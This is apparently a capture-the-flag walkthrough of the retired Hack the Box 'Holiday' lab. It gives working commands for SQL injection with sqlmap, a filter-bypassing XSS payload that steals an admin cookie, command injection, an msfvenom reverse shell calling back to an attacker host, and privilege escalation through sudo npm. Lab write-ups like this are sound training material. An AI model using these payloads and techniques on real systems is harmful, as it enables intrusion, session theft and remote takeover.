Hello friends!! Today we are going to solve another CTF challenge “Holiday” which is available online for those who want to increase their skill in penetration testing and black box testing. Holiday is retired vulnerable lab presented by Hack the Box for making online penetration practices according to your experience level; they have the collection of vulnerable labs as challenges from beginners to Expert level.
Level:Expert
Task:find user.txt and root.txt file on victim’s machine.
Since these labs are online available therefore they have static IP and IP of sense is 10.10.10.25 so let’s begin with nmap port enumeration.
nmap -A -p- 10.10.10.25 --openFrom given below image, you can observe we found port 22 and 8000 are open on target system.
data:image/s3,"s3://crabby-images/bbc51/bbc5114deb4e7dfc081fda0e1fcb4a56f3a89bcd" alt="Hack the Box: Holiday Walkthrough"
As port 8000 is running http we open the IP address in the browser, and find a webpage.
data:image/s3,"s3://crabby-images/679ae/679ae3f3c52dd2b9b2c7122afce4715c6a40d333" alt="Hack the Box: Holiday Walkthrough"
We didn’t find anything on the webpage so we use dirb to enumerate the directories.
dirb http://10.10.10.25:8000data:image/s3,"s3://crabby-images/6cbf6/6cbf6e8b694203d9aba01891dc487a07c24bfa4a" alt="Hack the Box: Holiday Walkthrough"
Dirb scan gives us a link to a directory called /login, we open the link and find a login page.
data:image/s3,"s3://crabby-images/714c6/714c6a78928fe3a63dacc3cc22a2269dd5323b87" alt="Hack the Box: Holiday Walkthrough"
We capture the login request using burpsuite. We use random credentials as placeholder.
data:image/s3,"s3://crabby-images/a5cf7/a5cf724b555bd32a65f03569a1a2869a9ae552ab" alt="Hack the Box: Holiday Walkthrough"
We use sqlmap to check if it is vulnerable to sql injection. After finding that it is vulnerable to sql injection, we use sqlmap to dump the database and find a username “RickA” and password hash.
sqlmap -r sql.txt dbms=SQLite -T users --columns --dump --batchdata:image/s3,"s3://crabby-images/758e8/758e883d2f0d12c296c7b5bf0ef4b54ecb28c5f0" alt="Hack the Box: Holiday Walkthrough"
We use hashkiller.co.uk to decrypt the hash and find the password to the user.
data:image/s3,"s3://crabby-images/4e519/4e519bc2b2814f9d16048b63f196cea6ca55c6ee" alt="Hack the Box: Holiday Walkthrough"
We login using these credentials and we are redirected to a page with that looks like it contains user information.
data:image/s3,"s3://crabby-images/17a64/17a6499ccfe77b91c73a18cc4b35db2c41d193f8" alt="Hack the Box: Holiday Walkthrough"
We click on one of the UUID link and find a page that we can post notes for the users. It also shows that it will take up to 1 minute to post the note.
data:image/s3,"s3://crabby-images/dabf0/dabf00b320289fd686ee44b2508f1619bbcc6cf6" alt="Hack the Box: Holiday Walkthrough"
We try exploit the note function, and find it is vulnerable xss. As the notes are being read by administrator xss can be used to get the admin cookie. To run xss and run our payload we need to bypass the filter using java script function String.fromCharCode to run our payload. I created this script here to convert string to ascii code.
data:image/s3,"s3://crabby-images/cbdec/cbdec277c859a8c7ce159a2c9c4bcefecb617959" alt="Hack the Box: Holiday Walkthrough"
We post the note to bypass the filter we have to use this payload:
<img src=”x/><script>eval(String.CharCode(<payload>));</script>”>data:image/s3,"s3://crabby-images/e4748/e47485e13bf524e3279c86f6b60276500692010e" alt="Hack the Box: Holiday Walkthrough"
We setup our listener using nc on port 80, as we will receive the the response of the page including the administrator cookie on this port.
nc -lvp 80After waiting for 1 minute we received the admin cookie.
data:image/s3,"s3://crabby-images/dda0b/dda0ba5b1f467a8705e8d9c5d681c45605e876f5" alt="Hack the Box: Holiday Walkthrough"
The cookie is url encoded we decode and use it hijack the administrator session.
data:image/s3,"s3://crabby-images/ebe24/ebe244e732c6613e3ece86b1b187cff97d5c6c87" alt="Hack the Box: Holiday Walkthrough"
We capture the webpage’s request using burpsuite. We change our cookie with that of administrator and forward it.
data:image/s3,"s3://crabby-images/8920a/8920a2e70b961573f2f908e88ef174164c636afe" alt="Hack the Box: Holiday Walkthrough"
As soon as we forward the request, we are able to successfully hijack the administrator session.
data:image/s3,"s3://crabby-images/e1273/e1273a7ee25e8247a26db67a13cc99e527188e79" alt="Hack the Box: Holiday Walkthrough"
We now go to /admin directory and find a page where there are options to export bookings and notes.
data:image/s3,"s3://crabby-images/c33bd/c33bdddb2564e8732eae58cef9bc2168c21ae0e9" alt="Hack the Box: Holiday Walkthrough"
We capture the request using burpsuite, and check if it is vulnerable to any king of injection. After enumerating we find that this page is vulnerable to command injection.
data:image/s3,"s3://crabby-images/a4d51/a4d5139ce54ce91064b97bd3e05426296c9a4c8d" alt="Hack the Box: Holiday Walkthrough"
We are unable to get a shell using web_delivery module of metaploit due to there being filters. Now we create a payload using msfvenom to upload into the target machine using command injection and get reverse shell.
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=10.10.14.8 lport=4444 f elf > shellAfter creating a shell, we create a python http server to upload into the target machine.
data:image/s3,"s3://crabby-images/9dcee/9dcee8563ff7df225fd34bc03e099dc67c028cd2" alt="Hack the Box: Holiday Walkthrough"
Now “.” Is not blacklisted so we convert the ipaddress into decimal number so that we can bypass the filter.
data:image/s3,"s3://crabby-images/6b043/6b043141609bf696a7b988beb6ff1939ae986f2a" alt="Hack the Box: Holiday Walkthrough"
We upload the shell using wget command into the target machine and save it in /tmp directory.
data:image/s3,"s3://crabby-images/abe4f/abe4fc2a765d51af9403ab63c96e032cada35d5c" alt="Hack the Box: Holiday Walkthrough"
As soon as we run the command we get a prompt that shell is uploaded.
data:image/s3,"s3://crabby-images/88d4c/88d4c8623ee36b354f01a277b73c2ebf14f1f8e3" alt="Hack the Box: Holiday Walkthrough"
We give our payload read, write and execute permission using command injection.
Now we setup our listener using metasploit.
msf > use exploit/multi/handler msf exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp msf exploit(multi/handler) > set lhost 10.10.14.8 msf exploit(multi/handler) > set lport 4444 msf exploit(multi/handler) > rundata:image/s3,"s3://crabby-images/de723/de7234b679e0a0b1777b7a860caa0e7e6d3c2f4e" alt="Hack the Box: Holiday Walkthrough"
We run the shell using command injection vulnerability on the target machine.
data:image/s3,"s3://crabby-images/a27bd/a27bdf974eda98be2cae67b5b04d69ae07ad19dc" alt="Hack the Box: Holiday Walkthrough"
As soon as we run the shell we get a reverse shell.
data:image/s3,"s3://crabby-images/61f1c/61f1c3437a8c4a45fd039d73221b37cc882e4e86" alt="Hack the Box: Holiday Walkthrough"
We spawn a tty shell and take a look at the sudoers list and find that we can run /usr/bin/npm I * as root with no password.
python -c "import pty; pty.spawn(‘/bin/bash’)" sudo -ldata:image/s3,"s3://crabby-images/4b982/4b98205772c2a804a62cf5a86a342b377710ba62" alt="Hack the Box: Holiday Walkthrough"
Before trying to get root shell we first enumerate rest of the directories and find a file called “user.txt” in /home/algernon directory. We take a look at the content of the files and find the first flag.
data:image/s3,"s3://crabby-images/d1a6c/d1a6cda70699bcc9e4a85ea7ad8460b2e5002236" alt="Hack the Box: Holiday Walkthrough"
Now we try to take root.txt we go to /app directory. We rename package.json to pack, and symlink /root/root.txt package.json
ln -s /root/root.txt package.jsondata:image/s3,"s3://crabby-images/9d876/9d876d6e70c7963942b680bfa82b820a36a80982" alt="Hack the Box: Holiday Walkthrough"
We run /usr/bin/npm i * as root user and find the final flag.